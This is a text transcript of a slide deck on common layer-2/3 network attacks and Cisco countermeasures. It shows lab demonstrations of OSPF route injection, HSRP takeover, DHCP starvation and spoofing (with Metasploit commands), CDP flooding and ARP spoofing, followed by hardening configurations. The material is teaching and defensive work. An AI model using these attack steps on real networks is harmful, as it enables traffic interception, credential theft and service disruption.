network attack counter
TRANSCRIPT
![Page 1: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/1.jpg)
Common Network Attacks and
Countermeasures
![Page 2: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/2.jpg)
Content
• OSPFNeighbor/RouteInjection
• HSRPActiveRouterManipulation
• DHCPStarvationandSpoofing
• CDPNeighborOverflow
• IPARPSpoofing
• Countermeasures
![Page 3: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/3.jpg)
OSPFNeighbor/RouteInjection
Scenario:
- AttackerandtwoOSPF-enabledroutersareinthesamenetwork.
- AttackeractsasOSPFrouter
- AttackersendsOSPFpacketstomanipulaterouters’neighbortablesandroutingtables
![Page 4: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/4.jpg)
OSPFNeighbor/RouteInjection
Originalneighbortablesonbothrouters
R1#showip ospf neighbor
NeighborIDPri StateDeadTimeAddressInterface192.168.0.21FULL/DR00:00:35192.168.0.2FastEthernet1/0
R2#showip ospf neighbor
NeighborIDPri StateDeadTimeAddressInterface192.168.0.11FULL/BDR00:00:30192.168.0.1FastEthernet2/0
![Page 5: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/5.jpg)
OSPFNeighbor/RouteInjection
Originalroutingtablesonbothrouters
R1#showip route
Gatewayoflastresortisnotset
C192.168.0.0/24isdirectlyconnected,FastEthernet1/0
R2#showip route
Gatewayoflastresortisnotset
C192.168.0.0/24isdirectlyconnected,FastEthernet2/0
![Page 6: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/6.jpg)
OSPFNeighbor/RouteInjection
LOKI:apythonbasedinfrastructurepentestingtoolfocusingonlayer3protocols.
![Page 7: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/7.jpg)
OSPFNeighbor/RouteInjection
SendingOSPFPacketsfromAttackerusingLoki
![Page 8: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/8.jpg)
OSPFNeighbor/RouteInjection
SendingOSPFPacketsfromAttackerusingLoki
![Page 9: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/9.jpg)
OSPFNeighbor/RouteInjectionSendingOSPFPacketsfromAttackerusingLoki
![Page 10: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/10.jpg)
OSPFNeighbor/RouteInjection
SendingOSPFPacketsfromAttackerusingLoki
![Page 11: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/11.jpg)
OSPFNeighbor/RouteInjection
AnotherneighborcomesupinR1anR2
R1#*Feb2008:27:58.479:%OSPF-5-ADJCHG:Process100,Nbr 192.168.0.11onFastEthernet1/0fromLOADINGtoFULL,LoadingDone
R1#showip ospf neighbor
NeighborIDPri StateDeadTimeAddressInterface192.168.0.21FULL/DR00:00:39192.168.0.2FastEthernet1/0192.168.0.111FULL/DROTHER00:00:37192.168.0.11FastEthernet1/0
![Page 12: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/12.jpg)
OSPFNeighbor/RouteInjection
AnotherneighborcomesupinR1anR2
R2#*Feb2008:27:58.639:%OSPF-5-ADJCHG:Process100,Nbr 192.168.0.11onFastEthernet2/0fromLOADINGtoFULL,LoadingDoneR2#R2#R2#showip ospf neighbor
NeighborIDPri StateDeadTimeAddressInterface192.168.0.11FULL/BDR00:00:34192.168.0.1FastEthernet2/0192.168.0.111FULL/DROTHER00:00:39192.168.0.11FastEthernet2/0R2#
![Page 13: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/13.jpg)
OSPFNeighbor/RouteInjectionInjectnetwork10.0.0.0/24toOSPFroutingtable
![Page 14: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/14.jpg)
OSPFNeighbor/RouteInjection
Network10.0.0.0/24appearsinroutingtablesofbothrouters
R1#showip route
Gatewayoflastresortisnotset
10.0.0.0/24issubnetted,1subnetsO10.0.0.0[110/2]via192.168.0.11,00:00:59,FastEthernet1/0C192.168.0.0/24isdirectlyconnected,FastEthernet1/0
R2#showip route
Gatewayoflastresortisnotset
10.0.0.0/24issubnetted,1subnetsO10.0.0.0[110/2]via192.168.0.11,00:00:54,FastEthernet2/0C192.168.0.0/24isdirectlyconnected,FastEthernet2/0
![Page 15: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/15.jpg)
HSRPActiveRouterManipulation
Scenario:
- TworoutersareenabledHSRP.
- AttackersendsnecessarypacketstoescalatehimselfasActiveRouter
- Attackernowservesasvirtualgateway.
- AlltrafficsfromUseraresentviaAttacker
![Page 16: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/16.jpg)
HSRPActiveRouterManipulation
Overview
• HotStandbyRouterProtocol(HSRP)providesdefaultgatewayredundancyusingoneactiveandonestandbyrouter.
• Thepriorityvaluecanbefrom0to255.Thedefaultvalueis100.
• DuringtheActiveRouterelectionprocess,therouterwiththehighestpriorityinanHSRPgroupbecomestheactiverouter.Ifatieoccurs,therouterwiththehighestconfiguredIPaddressbecomesactive
![Page 17: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/17.jpg)
HSRPActiveRouterManipulationNormalOperation:R2isactiverouterandR1isstandbyrouter
R1#showstandbyFastEthernet1/0- Group1StateisStandby1statechange,laststatechange00:00:38VirtualIPaddressis192.168.0.254ActivevirtualMACaddressis0000.0c07.ac01LocalvirtualMACaddressis0000.0c07.ac01(v1default)Hellotime3sec,holdtime10secNexthellosentin2.704secsPreemptionenabledActiverouteris192.168.0.2,priority100(expiresin10.400sec)StandbyrouterislocalPriority100(default100)Groupnameis"hsrp-Fa1/0-1"(default)
![Page 18: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/18.jpg)
HSRPActiveRouterManipulation
UseLokitomanipulateHSRPActiveRouter
![Page 19: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/19.jpg)
HSRPActiveRouterManipulation
WhenAttackOccurred:R2changeditselftostandbyrouter
R2#*Feb2012:32:13.443:%HSRP-5-STATECHANGE:FastEthernet2/0Grp 1stateActive->Speak
R2#*Feb2012:32:24.447:%HSRP-5-STATECHANGE:FastEthernet2/0Grp 1stateSpeak->StandbyR2#
![Page 20: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/20.jpg)
HSRPActiveRouterManipulation
WhenAttackOccurred:AttackersbecameActiveRouterwithpriority255
R2#showstandbyFastEthernet2/0- Group1StateisStandby4statechanges,laststatechange00:00:23VirtualIPaddressis192.168.0.254ActivevirtualMACaddressis0050.56c0.0002LocalvirtualMACaddressis0000.0c07.ac01(v1default)Hellotime3sec,holdtime10secNexthellosentin1.056secsPreemptionenabledActiverouteris192.168.0.11,priority255(expiresin10.496sec)StandbyrouterislocalPriority100(default100)Groupnameis"hsrp-Fa2/0-1"(default)
![Page 21: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/21.jpg)
DHCPStarvationandPoisoning
Scenario:
• R1isauthorizedDHCPserver
• UsersgetsIPsfromR1
• AttackertakesdowntheDHCPServer
• AttackerclaimshimselfasDHCPServer
• UsersgetsfakeIPsprovidedbyAttackerincludedDNSanddefaultgateway
• AttackernowcanservefakeDNSserviceorsniffusers’traffic
![Page 22: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/22.jpg)
DHCPStarvation:TakingdowntherealDHCPServerbygeneratingmanymany DHCP
DHCPStarvationandPoisoning
![Page 23: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/23.jpg)
DHCPStarvation:DHCPpoolisnowfullwithfakeclients
DHCPStarvationandPoisoning
![Page 24: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/24.jpg)
DHCPStarvation:DHCPserverisunabletoserveIPsmoretonextusers’request
R1#showip dhcp pool
PoolDHCP:Utilizationmark(high/low):100/0Subnetsize(first/next):0/0Totaladdresses:254Leasedaddresses:253Pendingevent:none1subnetiscurrentlyinthepool:CurrentindexIPaddressrangeLeasedaddresses0.0.0.0192.168.0.1- 192.168.0.254253R1#R1#
DHCPStarvationandPoisoning
![Page 25: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/25.jpg)
DHCPSPoofing:AttackerrunsDHCPserverwithfakeDNSIPorGateway
msf >useauxiliary/server/dhcpmsf auxiliary(dhcp)>setrouter192.168.0.1router=>192.168.0.1
msf auxiliary(dhcp)>setnetmask 255.255.255.0netmask =>255.255.255.0
msf auxiliary(dhcp)>setdnsserver 172.16.0.1dnsserver =>172.16.0.1
msf auxiliary(dhcp)>setsrvhost 192.168.0.11srvhost =>192.168.0.11
msf auxiliary(dhcp)>run[*]Auxiliarymoduleexecutioncompleted
[*]StartingDHCPserver...msf auxiliary(dhcp)>
DHCPStarvationandPoisoning
![Page 26: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/26.jpg)
DHCPSpoofing:NewusernowgetIPfromfakeDHCPserver
EthernetadapterVMwareNetworkAdapterVMnet2:
Connection-specificDNSSuffix.:Description...........:VMwareVirtualEthernetAdapterforVMnet2IPv4Address...........:192.168.0.33(Preferred)SubnetMask...........:255.255.255.0LeaseObtained..........:Monday,February20,201711:23:39PMLeaseExpires..........:Monday,February20,201711:33:39PMDefaultGateway.........:192.168.0.1DHCPServer...........:192.168.0.11
DNSServers...........:172.16.0.1
DHCPStarvationandPoisoning
![Page 27: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/27.jpg)
CDPNeighborOverflow
Scenario:
• AttackertriestofloodCDPpacketsintonetwork
• CDPtablesinroutersarefullwithfakedevices
![Page 28: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/28.jpg)
FloodingCDPpacket:UsingYersiniatogeneratepackets
CDPNeighborOverflow
![Page 29: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/29.jpg)
FloodingCDPpacket:Wireshark capturesatportfacetoattacker
CDPNeighborOverflow
![Page 30: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/30.jpg)
FloodingCDPpacket:CDPtablesatRouters
CDPNeighborOverflow
![Page 31: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/31.jpg)
FloodingCDPpacket:Processingpacketseatsuptherouter’sCPU
R2#showprocessescpu sortedCPUutilizationforfiveseconds:97%/100%;oneminute:74%;fiveminutes:25%PIDRuntime(ms)InvokeduSecs 5Sec1Min5MinTTYProcess7613403238953441170.66%42.54%14.98%0CDPProtocol9119584560349715.19%18.81%5.12%0Exec55112359142392.87%1.10%0.41%0Checkheaps
CDPNeighborOverflow
![Page 32: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/32.jpg)
ARPSpoofing
Scenario:
• R1isgatewaytoroutetrafficfromUser
• UsersendsARPrequestforMACofR1.
• AttackerrepliestoARPrequestsandprovideshisownMACaddresstoUser
• AlldataUserissenttoAttackerandthenisforwardedtoR1
![Page 33: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/33.jpg)
ARPSpoofing
BeforeSpoofingAttack:
• UsersendsARPrequesttotheNetworkaskingforMACAddressofGateway192.168.0.1.
• RouterrepliestotheRequestwithitsMACAddresswhichisca01.06e5.001c.
![Page 34: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/34.jpg)
ARPSpoofing
BeforeSpoofingAttack:AddressInfo.atR1
MACAddressofR1
R1#showint f1/0|i addressHardwareisDEC21140,addressisca01.06e5.001c (bia ca01.06e5.001c)Internetaddressis192.168.0.1/24R1#
ARPcacheinR1
R1#showip arp 192.168.0.3ProtocolAddressAge(min)HardwareAddr TypeInterfaceInternet192.168.0.30ca05.0790.0000 ARPAFastEthernet1/0R1#
![Page 35: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/35.jpg)
ARPSpoofing
BeforeSpoofingAttack:AddressInfo.atUser
MACAddressofUser
User#show int f0/0|i addressHardwareisDEC21140,addressisca05.0790.0000(bia ca05.0790.0000)Internetaddressis192.168.0.3/24User#
ARPcacheinUser
User#show ip arp 192.168.0.1ProtocolAddressAge(min)HardwareAddr TypeInterfaceInternet192.168.0.10ca01.06e5.001cARPAFastEthernet0/0User#User#
![Page 36: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/36.jpg)
ARPSpoofingStartSpoofingAttack:
MACAddressofAttacker
eth0:<BROADCAST,MULTICAST,UP,LOWER_UP>mtu 1500qdisc pfifo_fast stateUPgroupdefaultqlen 1000link/ether00:0c:29:0a:b4:51 brd ff:ff:ff:ff:ff:ffinet 192.168.0.11/24brd 192.168.0.255scopeglobaleth0
![Page 37: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/37.jpg)
ARPSpoofingStartSpoofingAttack:UseEttercap todoARPspoofing
ScanningHosts
![Page 38: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/38.jpg)
ARPSpoofing
StartSpoofingAttack:UseEttercap todoARPspoofing
Startspoofing
![Page 39: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/39.jpg)
ARPSpoofing
StartSpoofingAttack:
SniffingatinterfaceofUsermachinewithwireshark
![Page 40: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/40.jpg)
ARPSpoofingAfterSpoofingAttack:
Showip arp andfoundMACAddresseshavebeenspoofed
User#show ip arp 192.168.0.1ProtocolAddressAge(min)HardwareAddr TypeInterfaceInternet192.168.0.10 000c.290a.b451 ARPAFastEthernet0/0
R1#showip arp 192.168.0.3ProtocolAddressAge(min)HardwareAddr TypeInterfaceInternet192.168.0.30000c.290a.b451 ARPAFastEthernet1/0R1#
![Page 41: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/41.jpg)
ARPSpoofing
AfterSpoofingAttack:
TrytotelnetfromUsertoR1
User#telnet 192.168.0.1Trying192.168.0.1...Open
UserAccessVerification
Username:porhaiPassword:R1>R1>R1>
![Page 42: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/42.jpg)
ARPSpoofingAfterSpoofingAttack:Wireshark capturedatAttackermachine
![Page 43: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/43.jpg)
ARPSpoofingAfterSpoofingAttack:FollowTCPStream
![Page 44: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/44.jpg)
ExploitationTools
• Loki• MultiprotocolLabelSwitching(MPLS)• RoutingProtocol• FirstHopRedundancyProtocol• CiscoWirelessLANContextControlProtocol(WLCCP)• InternetControlMessageProtocolversion6(ICMP6)• TCP-MD5• AddressResolutionProtocol(ARP)• DOT1Q
![Page 45: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/45.jpg)
ExploitationTools
• Yersinia• SpanningTreeProtocol(STP)• CiscoDiscoveryProtocol(CDP)• DynamicTrunking Protocol(DTP)• DynamicHostConfigurationProtocol(DHCP)• IEEE802.1Q• IEEE802.1X• Inter-SwitchLinkProtocol(ISL)• VLANTrunking Protocol(VTP)• HotStandbyRouterProtocol(HSRP)
![Page 46: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/46.jpg)
ExploitationTools
• Ettercap• Puttingthenetworkinterfaceintopromiscuousmode• ARPspoofing• ARPpoisoning• Passwordcollectors• Packetfiltering/modifying/dropping• OSfingerprinting• Networkscanning
![Page 47: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/47.jpg)
Countermeasures• OpenShortestPathFirst(OSPF)• Setup messagedigestkeyforOSPFauthentication
• Perinterface:ipospf message-digest-keykey_idmd5complex_password
• EnableOSPFmessagedigestauthentication• Global:areaarea_id authenticationmessage-digest• Perinterface:ipospf authenticationmessage-digest
• Configurepassiveinterface• OSPFsub-command:passive-interfacedefault• OSPFsub-command: passive-interfaceinterface_typeinterface_id
![Page 48: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/48.jpg)
Countermeasures• EnhancedInteriorGatewayRoutingProtocol(EIGRP)
• SetupmessagedigestkeyforEIGRPauthentication• Perinterface:keychainkey_chain_name• Keychainsub-command:key key_id• Keychainkeysub-command:key-stringcomplex_password
• EnableEIGRPmessagedigestauthentication• Perinterface:ipauthenticationkey-chaineigrp AS_numberkey_chain_name
• Perinterface:ipauthenticationmodeeigrp AS_numbermd5
• Configurepassiveinterface• OSPFsub-command:passive-interfacedefault• OSPFsub-command: passive-interfaceinterface_type interface_id
![Page 49: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/49.jpg)
Countermeasures
• HotStandbyRouterProtocol(HSRP)• EnableHSRPmessagedigestwithkey-string
• Perinterface:standbygroup_id authenticationmd5key-stringcomplex_password
• Setupmessagedigestwithkey-chainforHSRPauthentication• Perinterface:keychainkey_chain_name• Keychainsub-command:key key_id• Keychainkeysub-command:key-stringcomplex_password
![Page 50: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/50.jpg)
Countermeasures• EnableHSRPmessagedigestwithkey-chain
• Perinterface:standbygroup_id authenticationmd5key-chainkey_chain_name
• SetHSRPprioritytohighest(255)• Perinterface:standbygroup_id prioritypriority_number
• SetHSRPinterfaceIPtohighest• Perinterface:ipaddressip_address subnet_mask
![Page 51: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/51.jpg)
Countermeasures
• VirtualRouterRedundancyProtocol(VRRP)• EnableVRRPmessagedigestwithkey-string
• Perinterface:vrrp group_id authenticationmd5key-stringcomplex_password
• Setupmessagedigestwithkey-chainforVRRPauthentication• Perinterface:keychainkey_chain_name• Keychainsub-command:key key_id• Keychainkeysub-command:key-stringcomplex_password
![Page 52: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/52.jpg)
Countermeasures
• EnableVRRPmessagedigestwithkey-chain• Perinterface:vrrp group_id authenticationmd5key-chainkey_chain_name
• SetVRRPprioritytohighest(254)• Perinterface:vrrp group_id prioritypriority_number
• SetHSRPinterfaceIPtohighest• Perinterface:ipaddressip_address subnet_mask
• SetupVRRPexplicitlyactiverouter• Perinterface:vrrp group_id ipip_of_physical_interface• Perinterface:vrrp group_id ipv6ip_of_physical_interface
![Page 53: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/53.jpg)
Countermeasures
• CiscoDiscoveryProtocol(CDP)• ShowCiscoDiscoveryProtocolstatus
• showcpd interface
• DisableCiscoDiscoveryProtocol• Global:nocdp run• Perinterface:nocdp enable
![Page 54: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/54.jpg)
Countermeasures
• DynamicHostConfigurationProtocol(DHCP)• ShowDHCPSnoopingstatus
• showip dhcp snooping
• SetupDHCPSnoopingtrustedinterface• Perinterface:ip dhcp snoopingtrust
• EnableDHCPSnooping• Global:ip dhcp snooping• Perinterface:ipdhcpsnoopingvlanvlan_id
![Page 55: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/55.jpg)
Countermeasures• ShowPort-Securitystatus
• showport-securityinterfaceinterface_type interface_id
• EnablePort-Security• Perinterface:switchport modeport-security
• LimitthenumberofMACaddresslearnoninterface• Perinterface:switchport port-securitymaximumnumber_of_mac_address
• SetPort-Securityviolationmode• Perinterface:switchport port-securityviolationviolation_mode
![Page 56: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/56.jpg)
Countermeasures• AddressResolutionProtocol(ARP)
• EnableDynamicARPInspection• Global:ip arp inspectionvlan vlan_id
• EnableDHCPSnooping• Global:ip dhcp snooping• Perinterface:ipdhcpsnoopingvlanvlan_id
• EnableIPSourceGuardwithDHCPSnooping• Perinterface:ip verifysourcevlan dhcp-snooping
• BindingMACaddressandstaticIPaddressforIPSourceGuard• Global:ip sourcebindingmac_address vlan vlan_id ip_addressinterfaceinterface_name
![Page 57: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/57.jpg)
Q&A
![Page 58: Network Attack Counter](https://reader031.vdocuments.site/reader031/viewer/2022013117/58ed45881a28ab3c258b4593/html5/thumbnails/58.jpg)
ThankYou!^^